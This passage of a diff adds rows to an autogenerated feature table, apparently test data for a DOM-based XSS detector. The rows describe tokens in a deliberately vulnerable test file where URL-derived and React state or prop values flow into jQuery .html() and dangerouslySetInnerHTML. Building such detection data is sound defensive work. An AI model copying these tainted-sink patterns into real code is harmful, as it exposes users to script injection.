exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | $('myId ... inted3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | $('myId ... inted3) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | $('myId ... inted3) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | $('myId ... inted3) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | $('myId ... inted3) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | exceptional return of $('myId ... inted3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | exceptional return of $('myId ... inted3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | exceptional return of $('myId ... inted3) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | exceptional return of $('myId ... inted3) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:47 | exceptional return of $('myId ... inted3) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:227:15:227:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:227:15:227:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:227:15:227:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17000,6 +117754,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:227:15:227:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:227:15:227:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:227:15:227:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:23:227:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:23:227:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:23:227:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:23:227:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:23:227:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:37 | this.props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:37 | this.props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:37 | this.props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:37 | this.props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:28:227:37 | this.props | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:227:28:227:46 | this.props.tainted3 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:227:28:227:46 | this.props.tainted3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:227:28:227:46 | this.props.tainted3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17007,6 +117776,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:227:28:227:46 | this.props.tainted3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:227:28:227:46 | this.props.tainted3 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:227:28:227:46 | this.props.tainted3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:33:227:37 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:33:227:37 | props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:33:227:37 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:33:227:37 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:33:227:37 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:39:227:46 | tainted3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:39:227:46 | tainted3 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:39:227:46 | tainted3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:39:227:46 | tainted3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:39:227:46 | tainted3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | $('myId ... ainted) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | $('myId ... ainted) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | $('myId ... ainted) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | $('myId ... ainted) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | $('myId ... ainted) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | exceptional return of $('myId ... ainted) | contextFunctionInterfaces | 